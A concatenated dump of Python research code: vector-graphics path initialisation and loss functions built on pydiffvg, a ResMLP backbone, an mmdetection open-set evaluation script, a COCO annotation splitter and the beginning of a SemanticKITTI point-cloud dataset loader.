parser.add_argument('--free', action='store_true')
parser.add_argument('--pool_size', type=int, default=12, help="the pooled image size for next path initialization")
parser.add_argument('--save_loss', action='store_true')
return parser.parse_args()
def init_new_paths(num_paths, canvas_width, canvas_height, args, num_old_shapes=0, pixel_loss=None):
shapes = []
shape_groups = []
# change path init location
if pixel_loss is not None:
region_loss = adaptive_avg_pool2d(pixel_loss, args.pool_size)
sorted, indices = torch.sort(region_loss.reshape(-1), dim=0, descending=True)
indices = indices[:num_paths]
indices_h = torch.div(indices, args.pool_size, rounding_mode='trunc')
indices_w = indices%(args.pool_size)
# [w,h] for diffvg
norm_postion = torch.cat([indices_w.unsqueeze(dim=-1), indices_h.unsqueeze(dim=-1)], dim=-1)
norm_postion = (norm_postion+0.5)/(args.pool_size + 1e-8)
# print(f"norm_position equals: {norm_postion}")
for i in range(num_paths):
num_segments = args.num_segments
num_control_points = torch.zeros(num_segments, dtype = torch.int32) + 2
points = []
p0 = (random.random(), random.random())
points.append(p0)
for j in range(num_segments):
radius = 0.05
p1 = (p0[0] + radius * (random.random() - 0.5), p0[1] + radius * (random.random() - 0.5))
p2 = (p1[0] + radius * (random.random() - 0.5), p1[1] + radius * (random.random() - 0.5))
p3 = (p2[0] + radius * (random.random() - 0.5), p2[1] + radius * (random.random() - 0.5))
points.append(p1)
points.append(p2)
if j < num_segments - 1:
points.append(p3)
p0 = p3
points = torch.tensor(points)
if pixel_loss is not None:
points = points-points.mean(dim=0, keepdim=True) + (norm_postion[i]).to(points.device)
# print(f"new path shape is {points.shape}, max val: {torch.max(points)}, min val: {torch.min(points)}")
points[:, 0] *= canvas_width
points[:, 1] *= canvas_height
path = pydiffvg.Path(num_control_points = num_control_points,
points = points,
stroke_width = torch.tensor(1.0),
is_closed = True)
shapes.append(path)
# !!!!!!problem is here. the shape group shape_ids is wrong
path_group = pydiffvg.ShapeGroup(shape_ids = torch.tensor([num_old_shapes+i]),
fill_color = torch.tensor([random.random(),
random.random(),
random.random(),
random.random()]))
shape_groups.append(path_group)
points_vars = []
color_vars = []
for path in shapes:
path.points.requires_grad = True
points_vars.append(path.points)
for group in shape_groups:
group.fill_color.requires_grad = True
color_vars.append(group.fill_color)
return shapes, shape_groups, points_vars, color_vars
def main():
args = parse_args()
# Use GPU if available
pydiffvg.set_use_gpu(torch.cuda.is_available())
random.seed(1234)
torch.manual_seed(1234)
render = pydiffvg.RenderFunction.apply
print(f"=> check init path ...")
# initialize new shapes related stuffs.
pixel_loss = torch.rand([1,1,240,240])
pixel_loss[0,0,2,200]=100
# pixel_loss[0,0,120,120]=100
# pixel_loss[0,0,239,239]=100
shapes, shape_groups, points_vars, color_vars = init_new_paths(
1, 240, 240, args, 0, pixel_loss)
save_name = 'check.svg'
pydiffvg.save_svg(save_name, 240, 240, shapes, shape_groups)
new_shapes = []
for path in shapes:
print(f"path point: {path.points}")
print(f"path point shape is: {path.points.shape}")
path.points = path.points-path.points.mean(dim=0,keepdim=True)+120
new_shapes.append(path)
# points_vars.append(path.points)
pydiffvg.save_svg("check2.svg", 240, 240, new_shapes, shape_groups)
# Optimize
points_vars = [*points_vars]
color_vars = [*color_vars]
# print(f"control points are: {points_vars}")
print(f"\nDone!\n")
if __name__ == "__main__":
main()
```
#### File: Layerwise/debug/debug_initialization.py
```python
import numpy as np
import cv2
import random
import torch
import matplotlib.pyplot as plt
def get_bezier_circle(radius=1, segments=4, bias=None):
points = []
if bias is None:
bias = (random.random(), random.random())
avg_degree = 360 / (segments*3)
for i in range(0, segments*3):
point = (np.cos(np.deg2rad(i * avg_degree)),
np.sin(np.deg2rad(i * avg_degree)))
points.append(point)
points = torch.tensor(points)
points = (points)*radius + torch.tensor(bias).unsqueeze(dim=0)
points = points.type(torch.FloatTensor)
return points
if __name__ == "__main__":
points = get_bezier_circle(0.1, 8)
print(points.shape)
print(points)
x_list = []
y_list = []
labels = []
for i in range(0, points.shape[0]):
x_list.append((points[i,0]).item())
y_list.append((points[i,1]).item())
labels.append(i)
fig, ax = plt.subplots()
ax.scatter(x_list, y_list)
ax.plot(x_list, y_list)
for i, txt in enumerate(labels):
ax.annotate(txt, (x_list[i], y_list[i]))
plt.show()
```
#### File: pair/Layerwise/recursive.py
```python
import pydiffvg
import torch
import os
import skimage
import skimage.io
import random
import argparse
import math
import errno
from tqdm import tqdm
from torch.optim.lr_scheduler import CosineAnnealingLR
pydiffvg.set_print_timing(False)
gamma = 1.0
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("target", help="target image path")
parser.add_argument("--num_paths", type=str, default="1,2")
parser.add_argument("--num_segments", type=int, default=4)
parser.add_argument("--num_iter", type=int, default=500)
parser.add_argument('--free', action='store_true')
return parser.parse_args()
try:
os.makedirs("results/recursive")
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir("results/recursive"):
pass
else:
raise
def load_image(args):
target = torch.from_numpy(skimage.io.imread(args.target)).to(torch.float32) / 255.0
print(f"Input image shape is: {target.shape}")
if target.shape[2] == 4:
print("Input image includes alpha channel, simply dropout alpha channel.")
target = target[:, :, :3]
target = target.pow(gamma)
target = target.to(pydiffvg.get_device())
target = target.unsqueeze(0).permute(0, 3, 1, 2) # NHWC -> NCHW
return target
def init_new_paths(num_paths, canvas_width, canvas_height, args):
shapes = []
shape_groups = []
for i in range(num_paths):
num_segments = args.num_segments
num_control_points = torch.zeros(num_segments, dtype = torch.int32) + 2
points = []
p0 = (random.random(), random.random())
points.append(p0)
for j in range(num_segments):
radius = 0.05
p1 = (p0[0] + radius * (random.random() - 0.5), p0[1] + radius * (random.random() - 0.5))
p2 = (p1[0] + radius * (random.random() - 0.5), p1[1] + radius * (random.random() - 0.5))
p3 = (p2[0] + radius * (random.random() - 0.5), p2[1] + radius * (random.random() - 0.5))
points.append(p1)
points.append(p2)
if j < num_segments - 1:
points.append(p3)
p0 = p3
points = torch.tensor(points)
points[:, 0] *= canvas_width
points[:, 1] *= canvas_height
path = pydiffvg.Path(num_control_points = num_control_points,
points = points,
stroke_width = torch.tensor(1.0),
is_closed = True)
shapes.append(path)
path_group = pydiffvg.ShapeGroup(shape_ids = torch.tensor([len(shapes) - 1]),
fill_color = torch.tensor([random.random(),
random.random(),
random.random(),
random.random()]))
shape_groups.append(path_group)
points_vars = []
color_vars = []
for path in shapes:
path.points.requires_grad = True
points_vars.append(path.points)
for group in shape_groups:
group.fill_color.requires_grad = True
color_vars.append(group.fill_color)
return shapes, shape_groups, points_vars, color_vars
def main():
args = parse_args()
# Use GPU if available
pydiffvg.set_use_gpu(torch.cuda.is_available())
filename = os.path.splitext(os.path.basename(args.target))[0]
target = load_image(args)
canvas_width, canvas_height = target.shape[3], target.shape[2]
num_paths_list = [int(i) for i in args.num_paths.split(',')]
random.seed(1234)
torch.manual_seed(1234)
render = pydiffvg.RenderFunction.apply
current_path_str = ""
old_shapes, old_shape_groups = [], []
for num_paths in num_paths_list:
print(f"=> Adding {num_paths} paths ...")
current_path_str = current_path_str+str(num_paths)+","
# initialize new shapes related stuffs.
shapes, shape_groups, points_vars, color_vars = init_new_paths(num_paths, canvas_width, canvas_height, args)
old_points_vars = []
old_color_vars = []
if len(old_shapes)>0:
for old_path in old_shapes:
if args.free:
old_path.points.requires_grad = True
old_points_vars.append(old_path.points)
else:
old_path.points.requires_grad = False
for old_group in old_shape_groups:
if args.free:
old_group.fill_color.requires_grad = True
old_color_vars.append(old_group.fill_color)
else:
old_group.fill_color.requires_grad = False
shapes = old_shapes+shapes
shape_groups = old_shape_groups+shape_groups
# Optimize
points_vars = old_points_vars + points_vars
color_vars = old_color_vars + color_vars
points_optim = torch.optim.Adam(points_vars, lr=1.0)
color_optim = torch.optim.Adam(color_vars, lr=0.01)
points_scheduler = CosineAnnealingLR(points_optim, args.num_iter, eta_min=0.1)
color_scheduler = CosineAnnealingLR(color_optim, args.num_iter, eta_min=0.001)
# Adam iterations.
t_range = tqdm(range(args.num_iter))
for t in t_range:
points_optim.zero_grad()
color_optim.zero_grad()
# Forward pass: render the image.
scene_args = pydiffvg.RenderFunction.serialize_scene(canvas_width, canvas_height, shapes, shape_groups)
img = render(canvas_width, canvas_height, 2, 2, t, None, *scene_args)
# Compose img with white background
img = img[:, :, 3:4] * img[:, :, :3] + torch.ones(img.shape[0], img.shape[1], 3, device = pydiffvg.get_device()) * (1 - img[:, :, 3:4])
# if t == args.num_iter - 1:
# pydiffvg.imwrite(img.cpu(), 'results/recursive/{}_path{}[{}].png'.
# format(filename, args.num_paths, current_path_str[:-1]), gamma=gamma)
img = img[:, :, :3]
img = img.unsqueeze(0).permute(0, 3, 1, 2) # HWC -> NCHW
loss = (img - target).pow(2).mean()
# print(f'iteration: {t} \t render loss: {loss.item()}')
t_range.set_postfix({'loss': loss.item()})
# Backpropagate the gradients.
loss.backward()
# Take a gradient descent step.
points_optim.step()
color_optim.step()
points_scheduler.step()
color_scheduler.step()
for group in shape_groups:
group.fill_color.data.clamp_(0.0, 1.0)
if t == args.num_iter - 1:
save_name = 'results/recursive/{}_path{}[{}]-segments{}'.\
format(filename, args.num_paths,current_path_str[:-1], args.num_segments)
if args.free:
save_name+='-free'
save_name+='.svg'
pydiffvg.save_svg(save_name, canvas_width, canvas_height, shapes, shape_groups)
old_shapes = shapes
old_shape_groups = shape_groups
print(f"\nDone! total {sum(num_paths_list)} paths, the last loss is: {loss.item()}.\n")
if __name__ == "__main__":
main()
```
#### File: pair/Layerwise/XingLoss_bak.py
```python
import torch
import numpy as np
def cross_mul(a, b, c):
return (c[1] - a[1]) * (b[0] - a[0]) - (b[1] - a[1]) * (c[0] - a[0])
def triangle_area(A, B, C):
out = (C - A).flip([-1]) * (B - A)
out = out[..., 1] - out[..., 0]
return out
def xing_loss(x_list, scale=1.0): # x[ npoints,2]
loss = 0.
for x in x_list:
x1 = torch.cat([x[1:, :], x[:1, :]], dim=0)
segments = torch.cat([x.unsqueeze(dim=-1), x1.unsqueeze(dim=-1)],
dim=-1) # [npoints, 2, 2], npoints, xy, start-end
mutual_segments = segments.unsqueeze(dim=1).expand(-1, x.shape[0], -1, -1) # [npoints,npoints,2,2]
mutual_segments_2 = torch.transpose(mutual_segments, 0, 1)
mutual_segments = torch.cat([mutual_segments, mutual_segments_2], dim=-1) # [npoints,npoints,2,4] 4 is A,B,C,D
Area_AB_C = triangle_area(mutual_segments[:, :, :, 0], mutual_segments[:, :, :, 1], mutual_segments[:, :, :, 2])
Area_AB_D = triangle_area(mutual_segments[:, :, :, 0], mutual_segments[:, :, :, 1], mutual_segments[:, :, :, 3])
Area_CD_A = triangle_area(mutual_segments[:, :, :, 2], mutual_segments[:, :, :, 3], mutual_segments[:, :, :, 0])
Area_CD_B = triangle_area(mutual_segments[:, :, :, 2], mutual_segments[:, :, :, 3], mutual_segments[:, :, :, 1])
condition1 = ((Area_AB_C * Area_AB_D) <= 0.).float()
condition2 = ((Area_CD_A * Area_CD_B) <= 0.).float()
mask = condition1*condition2 # mask is without gradient.
area_AB_1 = (abs(Area_AB_C))/(abs(Area_AB_D)+ 1e-5)
area_AB_2 = (abs(Area_AB_D))/(abs(Area_AB_C)+ 1e-5)
area_AB,_ = torch.cat([area_AB_1.unsqueeze(dim=-1),area_AB_2.unsqueeze(dim=-1)],dim=-1).min(dim=-1)
area_AB = torch.clip(area_AB, 0.0, 1.0)
area_AB = torch.nan_to_num(area_AB, nan=0.0)
area_CD_1 = (abs(Area_CD_A))/(abs(Area_CD_B)+ 1e-5)
area_CD_2 = (abs(Area_CD_B))/(abs(Area_CD_A)+ 1e-5)
area_CD, _ = torch.cat([area_CD_1.unsqueeze(dim=-1),area_CD_2.unsqueeze(dim=-1)],dim=-1).min(dim=-1)
area_CD = torch.clip(area_CD, 0.0, 1.0)
area_CD = torch.nan_to_num(area_CD, nan=0.0)
area_loss, _ = torch.cat([area_AB.unsqueeze(dim=-1),area_CD.unsqueeze(dim=-1)],dim=-1).min(dim=-1)
area_loss = area_loss*mask
# print(f"mask is: {mask}")
# print(f"area_loss is: {area_loss}")
area_loss = area_loss.sum()/((x.shape[0]-2)**2)
loss += area_loss*scale
return loss / (len(x_list))
if __name__ == "__main__":
x = torch.rand([6, 2])
scale = 0.001
y = xing_loss([x], scale)
print(y)
"""
a = torch.Tensor([0., 0.])
b = torch.Tensor([0., 3.])
c = torch.Tensor([4., 0.])
print(cross_mul(b, a, c))
a = torch.Tensor([[1, 2, 3, 4]])
a = a.expand(4, -1)
print(a)
b = torch.transpose(a, 0, 1)
print(b)
"""
# a = torch.Tensor([[0, 0]])
# b = torch.Tensor([[0, 3]])
# c = torch.Tensor([[1, 1]])
# d = torch.Tensor([[-1, 1]])
# print(triangle_area(a, b, c))
# print(triangle_area(a, b, d))
# a =torch.rand(3,2)
# v,id = a.min(dim=-1)
# print(v)
# print(id)
# print(f"===> test cosine similarity ===")
# # doesn't work
# points = torch.rand(13,2)
# point_init = points[:1,:]
# cos = torch.nn.CosineSimilarity(dim=1, eps=1e-6)
# smi = cos(point_init, points)
# indx = torch.argsort(smi, dim=0, descending=True)
# points = points[indx,:]
# print(smi)
# print(f"===> vis cosine similarity ===")
# points = torch.Tensor([[0.9665, 0.4407],
# [0.9724, 0.4446],
# [0.9603, 0.4345],
# [0.9202, 0.4145],
# [0.9622, 0.4459],
# [0.9445, 0.4152],
# [0.9545, 0.4520],
# [0.9857, 0.4314],
# [0.9638, 0.4654],
# [0.9418, 0.4613],
# [0.9435, 0.3927],
# [0.9455, 0.3910]])
# points = torch.rand(14,2)
# # sort control points by cosine-limilarity.
# point_init = points.mean(dim=0, keepdim=True)
# import torch.nn.functional as F
# smi = F.cosine_similarity(torch.tensor([[1.,0.]]), points-point_init, dim=1, eps=1e-6)
# print(f"smi is {smi}")
# indx = torch.argsort(smi, dim=0, descending=False)
# print(points)
# print(indx)
# points = points[indx,:]
# print(points)
# smi = F.cosine_similarity(point_init, points, dim=1, eps=1e-6)
# print(smi)
#
#
# x_list = []
# y_list = []
# labels = []
# for i in range(0, points.shape[0]):
# x_list.append(points[i,0])
# y_list.append(points[i,1])
# labels.append(i)
# import matplotlib.pyplot as plt
# fig, ax = plt.subplots()
# ax.scatter(x_list, y_list)
# ax.scatter([point_init[0,0]], [point_init[0,1]])
# ax.plot(x_list, y_list)
# for i, txt in enumerate(labels):
# ax.annotate(txt, (x_list[i], y_list[i]))
# plt.show()
# a =torch.rand(4,1)
# b = torch.permute(a, dims=[1,0])
# c = torch.matmul(a,b)
# d = torch.triu(c, diagonal=2)
# print(c)
# print(d)
a = torch.Tensor([[0.,-1.]])
b = torch.tensor([[-0.5,-0.5]])
import torch.nn.functional as F
sim = torch.cosine_similarity(a, b, dim=1, eps=1e-6)
print(sim)
inner_product = (a * b).sum(dim=1)
a_norm = a.pow(2).sum(dim=1).pow(0.5)
b_norm = b.pow(2).sum(dim=1).pow(0.5)
cos = inner_product / (2 * a_norm * b_norm)
angle = torch.acos(cos)
print(cos)
print(torch.atan2(torch.Tensor([-0.0001]),torch.Tensor([-1.])))
```
#### File: pair/Layerwise/XingLoss.py
```python
import torch
import numpy as np
def area(a, b, c):
return (c[1] - a[1]) * (b[0] - a[0]) - (b[1] - a[1]) * (c[0] - a[0])
def triangle_area(A, B, C):
out = (C - A).flip([-1]) * (B - A)
out = out[..., 1] - out[..., 0]
return out
def compute_sine_theta(s1, s2): #s1 and s2 aret two segments to be uswed
#s1, s2 (2, 2)
v1 = s1[1,:] - s1[0, :]
v2 = s2[1,:] - s2[0, :]
#print(v1, v2)
sine_theta = ( v1[0] * v2[1] - v1[1] * v2[0] ) / (torch.norm(v1) * torch.norm(v2))
return sine_theta
def xing_loss(x_list, scale=1e-3): # x[ npoints,2]
loss = 0.
#print(len(x_list))
for x in x_list:
#print(x)
seg_loss = 0.
N = x.size()[0]
x = torch.cat([x,x[0,:].unsqueeze(0)], dim=0) #(N+1,2)
segments = torch.cat([x[:-1,:].unsqueeze(1), x[1:,:].unsqueeze(1)], dim=1) #(N, start/end, 2)
assert N % 3 == 0, 'The segment number is not correct!'
segment_num = int(N / 3)
for i in range(segment_num):
cs1 = segments[i*3, :, :] #start control segs
cs2 = segments[i*3 + 1, :, :] #middle control segs
cs3 = segments[i*3 + 2, :, :] #end control segs
#print('the direction of the vectors:')
#print(compute_sine_theta(cs1, cs2))
direct = (compute_sine_theta(cs1, cs2) >= 0).float()
opst = 1 - direct #another direction
sina = compute_sine_theta(cs1, cs3) #the angle between cs1 and cs3
seg_loss += direct * torch.relu( - sina) + opst * torch.relu(sina)
# print(direct, opst, sina)
seg_loss /= segment_num
templ = seg_loss
loss += templ * scale #area_loss * scale
return loss / (len(x_list))
if __name__ == "__main__":
#x = torch.rand([6, 2])
#x = torch.tensor([[0,0], [1,1], [2,1], [1.5,0]])
x = torch.tensor([[0,0], [1,1], [2,1], [0.5,0]])
#x = torch.tensor([[1,0], [2,1], [0,1], [2,0]])
scale = 1 #0.5
y = xing_loss([x], scale)
print(y)
x = torch.tensor([[0,0], [1,1], [2,1], [2.,0]])
#x = torch.tensor([[1,0], [2,1], [0,1], [2,0]])
scale = 1 #0.5
y = xing_loss([x], scale)
print(y)
```
#### File: realimage/models/Example.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import pydiffvg
from torchvision.models import resnet50
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
pydiffvg.set_use_gpu(torch.cuda.is_available())
class Predictor(nn.Module):
def __init__(self, paths=512, segments=2, max_width=2.0, im_size=224.0):
super(Predictor, self).__init__()
self.points = nn.Parameter(torch.rand(2 * paths * (segments * 3 + 1)))
self.widths = nn.Parameter(torch.rand(paths))
self.colors = nn.Parameter(torch.rand(paths*4))
self.max_width = max_width
self.im_size = im_size
def forward(self): # [b,z_dim]
points = torch.tanh(self.points)
points = points * (self.im_size // 2) + self.im_size // 2
widths = torch.sigmoid(self.widths)
widths = (self.max_width - 1) * widths + 1
colors = torch.sigmoid(self.colors)
return {
"points": points,
"widths": widths,
"colors": colors
}
if __name__ == '__main__':
model = Predictor()
model.to("cuda")
out = model()
print(out)
```
#### File: models/backbone/conv_resmlp1.py
```python
import torch
import numpy as np
from torch import nn
from einops.layers.torch import Rearrange
class Aff(nn.Module):
def __init__(self, dim):
super().__init__()
self.alpha = nn.Parameter(torch.ones([1, 1, dim]))
self.beta = nn.Parameter(torch.zeros([1, 1, dim]))
def forward(self, x):
x = x * self.alpha + self.beta
return x
class FeedForward(nn.Module):
def __init__(self, dim, hidden_dim, dropout = 0.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, hidden_dim),
nn.GELU(),
nn.Dropout(dropout),
nn.Linear(hidden_dim, dim),
nn.Dropout(dropout)
)
def forward(self, x):
return self.net(x)
class MLPblock(nn.Module):
def __init__(self, dim, num_patch, mlp_dim, dropout = 0., init_values=1e-4):
super().__init__()
self.pre_affine = Aff(dim)
self.token_mix = nn.Sequential(
Rearrange('b n d -> b d n'),
nn.Linear(num_patch, num_patch),
Rearrange('b d n -> b n d'),
)
self.ff = nn.Sequential(
FeedForward(dim, mlp_dim, dropout),
)
self.post_affine = Aff(dim)
self.gamma_1 = nn.Parameter(init_values * torch.ones((dim)), requires_grad=True)
self.gamma_2 = nn.Parameter(init_values * torch.ones((dim)), requires_grad=True)
def forward(self, x):
x = self.pre_affine(x)
x = x + self.gamma_1 * self.token_mix(x)
x = self.post_affine(x)
x = x + self.gamma_2 * self.ff(x)
return x
class ConvResMLP1(nn.Module):
def __init__(self, in_channels=3, dim=384, num_classes=384, patch_size=16, image_size=224, depth=12, mlp_dim=384*4):
super().__init__()
assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.'
self.num_patch = (image_size// patch_size) ** 2
self.to_patch_embedding = nn.Sequential(
nn.Conv2d(in_channels, dim, patch_size, patch_size),
nn.BatchNorm2d(dim),
nn.GELU(),
nn.Conv2d(dim, dim, 3, padding=1),
nn.BatchNorm2d(dim),
nn.GELU(),
nn.Conv2d(dim, dim, 3, padding=1),
Rearrange('b c h w -> b (h w) c'),
)
self.mlp_blocks = nn.ModuleList([])
for _ in range(depth):
self.mlp_blocks.append(MLPblock(dim, self.num_patch, mlp_dim))
self.affine = Aff(dim)
# self.fc = nn.Sequential(
# nn.Linear(dim, num_classes)
# )
def forward(self, x):
x = self.to_patch_embedding(x)
for mlp_block in self.mlp_blocks:
x = mlp_block(x)
x = self.affine(x)
# x = x.mean(dim=1)
return x
if __name__ == "__main__":
img = torch.ones([1, 3, 224, 224])
model = ConvResMLP1()
parameters = filter(lambda p: p.requires_grad, model.parameters())
parameters = sum([np.prod(p.size()) for p in parameters]) / 1_000_000
print('Trainable Parameters: %.3fM' % parameters)
out_img = model(img)
print("Shape of out :", out_img.shape) # [B, in_channels, image_size, image_size]
``` |
{
"source": "13952522076/mmdetection",
"score": 2
} |
#### File: datasets/ADE20k_process/coco_split.py
```python
import os
import glob
import argparse
import json
import numpy as np
from scipy.misc import imread
from pycocotools import mask as COCOmask
# strict mapping class
split_coco_id_24classes = [60, 1, 61, 57, 3, 72, 73, 62, 74, 14, 64, 9, 6, 8, 5,
40, 70, 33, 69, 2, 63, 76, 10, 75 ]
split_coco_id_24classes = [60, 1, 61, 57, 3, 72, 73, 62, 74, 14, 64, 9, 6, 8, 5,
40, 70, 33, 69, 2, 63, 76, 10, 75,58, 12, 25, 47, 48,
49, 50, 51, 52, 53, 54, 55, 56, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24]
def parse_args():
parser = argparse.ArgumentParser(description='Evaluation demo')
parser.add_argument('--ann_file', default='/Users/melody/Downloads/instances_val2017.json') # CHANGE ACCORDINGLY
parser.add_argument('--output_overlap_json', default='/Users/melody/Downloads/instances_val2017_24classes.json')
parser.add_argument('--output_rest__json', default='/Users/melody/Downloads/instances_val2017_76classes.json')
# parser.add_argument('--parsing_2coco', action='store_true', help='Parsing ADE20K cat_id to COCO id.')
args = parser.parse_args()
return args
def convert(args):
data_dict = json.load(open(args.ann_file, 'r'))
images = data_dict['images']
licenses = data_dict['licenses']
info = data_dict['info']
categories = data_dict['categories']
annotations = data_dict['annotations']
print('#Images: {}, # totally instances: {}'.format(len(images), len(annotations)))
overlap_ann = []
rest_ann = []
for i in range(0,len(annotations)):
if i % 100 == 0:
print('#files processed: {}'.format(i))
if annotations[i]['category_id']in split_coco_id_24classes:
overlap_ann.append(annotations[i])
else:
rest_ann.append(annotations[i])
overlap_out = {'licenses': licenses,
'categories': categories,
'images': images,
'annotations': overlap_ann,
'info': info
}
rest_out = {'licenses': licenses,
'categories': categories,
'images': images,
'annotations': rest_ann,
'info': info
}
print("{}: instance: {}".format(args.output_overlap_json, len(overlap_ann)))
with open(args.output_overlap_json, 'w') as f:
json.dump(overlap_out, f)
print("{}: instance: {}".format(args.output_rest__json, len(rest_ann)))
with open(args.output_rest__json, 'w') as f:
json.dump(rest_out, f)
if __name__ == '__main__':
args = parse_args()
convert(args)
``` |
{
"source": "13952522076/mmdet",
"score": 2
} |
#### File: mmdet/helper/test_result_val.py
```python
import argparse
import os
import mmcv
import torch
from tqdm import tqdm
from mmcv import Config, DictAction
from mmcv.parallel import MMDataParallel, MMDistributedDataParallel
from mmcv.runner import get_dist_info, init_dist, load_checkpoint
from tools.fuse_conv_bn import fuse_module
from mmdet.apis import multi_gpu_test, single_gpu_test
from mmdet.core import wrap_fp16_model
from mmdet.datasets import build_dataloader, build_dataset
from mmdet.models import build_detector
from mmdet.datasets.coco import CocoDataset
import warnings
from mmdet.helper.openmax import *
def parse_args():
parser = argparse.ArgumentParser(
description='Lightweight MMDet test (and eval) a model from the results.pkl')
parser.add_argument('config', help='test config file path')
parser.add_argument('checkpoint', help='checkpoint file')
parser.add_argument('--out', default='/home/xuma/mmdet/work_dirs/mask_rcnn_osr50/output_val.pkl',
help='output result file in pickle format')
parser.add_argument('--weibull', default='/home/xuma/mmdet/work_dirs/mask_rcnn_osr50/weibull_model.pkl',
help='output result file in pickle format')
parser.add_argument('--threshold',type=float,default=0.1, help='score threshold for known classes')
parser.add_argument('--knownclass', type=int, default=50, help="the number of known classes")
parser.add_argument('--alpha', type=int, default=10, help="parameter alpha for openmax")
parser.add_argument(
'--fuse-conv-bn',
action='store_true',
help='Whether to fuse conv and bn, this will slightly increase'
'the inference speed')
parser.add_argument(
'--format-only',
action='store_true',
help='Format the output results without perform evaluation. It is'
'useful when you want to format the result to a specific format and '
'submit it to the test server')
parser.add_argument(
'--eval',
type=str,
nargs='+',
help='evaluation metrics, which depends on the dataset, e.g., "bbox",'
' "segm", "proposal" for COCO, and "mAP", "recall" for PASCAL VOC')
parser.add_argument('--show', action='store_true', help='show results')
parser.add_argument(
'--show-dir', help='directory where painted images will be saved')
parser.add_argument(
'--show-score-thr',
type=float,
default=0.3,
help='score threshold (default: 0.3)')
parser.add_argument(
'--gpu-collect',
action='store_true',
help='whether to use gpu to collect results.')
parser.add_argument(
'--tmpdir',
help='tmp directory used for collecting results from multiple '
'workers, available when gpu-collect is not specified')
parser.add_argument(
'--options', nargs='+', action=DictAction, help='arguments in dict')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
return args
def main():
args = parse_args()
warnings.filterwarnings('ignore')
assert args.out or args.eval or args.format_only or args.show \
or args.show_dir, \
('Please specify at least one operation (save/eval/format/show the '
'results / save the results) with the argument "--out", "--eval"'
', "--format-only", "--show" or "--show-dir"')
if args.eval and args.format_only:
raise ValueError('--eval and --format_only cannot be both specified')
if args.out is not None and not args.out.endswith(('.pkl', '.pickle')):
raise ValueError('The output file must be a pkl file.')
cfg = Config.fromfile(args.config)
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
cfg.model.pretrained = None
if cfg.model.get('neck'):
if cfg.model.neck.get('rfp_backbone'):
if cfg.model.neck.rfp_backbone.get('pretrained'):
cfg.model.neck.rfp_backbone.pretrained = None
cfg.data.test.test_mode = True
# init distributed env first, since logger depends on the dist info.
if args.launcher == 'none':
distributed = False
else:
distributed = True
init_dist(args.launcher, **cfg.dist_params)
# build the dataloader
# TODO: support multiple images per gpu (only minor changes are needed)
dataset = build_dataset(cfg.data.test)
outputs = mmcv.load(args.out)
weibull_model = mmcv.load(args.weibull)
new_outputs= []
known_classes = list(range(1, args.knownclass+1))
for image in tqdm(outputs):
bboxes, segs, feas = image
new_bboxes = [ [] for _ in range(0,args.knownclass+1)]
new_segs = [ [] for _ in range(0,args.knownclass+1)]
new_feas = [ [] for _ in range(0,args.knownclass+1)]
for i in range(0,len(feas)):
if len(feas[i])>0:
for j in range(0,len(feas[i])):
roi_cat_fea = np.expand_dims(feas[i][j], axis=0)
so, _ = openmax(weibull_model, known_classes, roi_cat_fea, 0.5, args.alpha, "euclidean")
predicted_label_index = np.argmax(so) if np.max(so) >= args.threshold else args.knownclass
new_feas[predicted_label_index].append(feas[i][j])
new_segs[predicted_label_index].append(segs[i][j])
new_bboxes[predicted_label_index].append(bboxes[i][j])
new_feas = [np.asarray(new_fea) for new_fea in new_feas]
# new_segs = [np.asarray(new_seg) for new_seg in new_segs]
new_bboxes = [np.asarray(new_bbox) for new_bbox in new_bboxes]
new_image= new_bboxes,new_segs,new_feas
new_outputs.append(new_image)
print("New ouput of openmax generated!!")
rank, _ = get_dist_info()
if rank == 0:
kwargs = {} if args.options is None else args.options
if args.format_only:
dataset.format_results(new_outputs, **kwargs)
if args.eval:
dataset.openevaluate(new_outputs, args.eval, **kwargs)
print("original output:")
dataset.openevaluate(outputs, args.eval, **kwargs)
if __name__ == '__main__':
main()
```
#### File: mmdet/helper/features2result.py
```python
import numpy as np
import torch
def features2result(features, labels, num_classes):
"""Convert detection results to a list of numpy arrays.
Args:
features (Tensor): shape (n, num_classes)
labels (Tensor): shape (n, )
num_classes (int): class number, including background class
Returns:
list(ndarray): bbox results of each class
"""
if features.shape[0] == 0:
return [np.zeros((0, num_classes), dtype=np.float32) for i in range(num_classes)]
else:
features = features.cpu().numpy()
labels = labels.cpu().numpy()
return [features[labels == i, :] for i in range(num_classes)]
``` |
{
"source": "13952522076/RandLA-Net-pytorch-1",
"score": 2
} |
#### File: RandLA-Net-pytorch-1/dataset/semkitti_trainset.py
```python
from utils.data_process import DataProcessing as DP
from utils.config import ConfigSemanticKITTI as cfg
from os.path import join
import numpy as np
import pickle
import torch.utils.data as torch_data
import torch
class SemanticKITTI(torch_data.Dataset):
def __init__(self, mode, data_list=None):
self.name = 'SemanticKITTI'
self.dataset_path = './data/SemanticKITTI/dataset/sequences_0.06'
self.num_classes = cfg.num_classes
self.ignored_labels = np.sort([0])
self.mode = mode
if data_list is None:
if mode == 'training':
seq_list = ['00', '01', '02', '03', '04', '05', '06', '07', '09', '10']
elif mode == 'validation':
seq_list = ['08']
self.data_list = DP.get_file_list(self.dataset_path, seq_list)
else:
self.data_list = data_list
self.data_list = sorted(self.data_list)
def get_class_weight(self):
return DP.get_class_weights(self.dataset_path, self.data_list, self.num_classes)
def __len__(self):
return len(self.data_list)
def __getitem__(self, item):
selected_pc, selected_labels, selected_idx, cloud_ind = self.spatially_regular_gen(item, self.data_list)
return selected_pc, selected_labels, selected_idx, cloud_ind
def spatially_regular_gen(self, item, data_list):
# Generator loop
cloud_ind = item
pc_path = data_list[cloud_ind]
pc, tree, labels = self.get_data(pc_path)
# crop a small point cloud
pick_idx = np.random.choice(len(pc), 1)
selected_pc, selected_labels, selected_idx = self.crop_pc(pc, labels, tree, pick_idx)
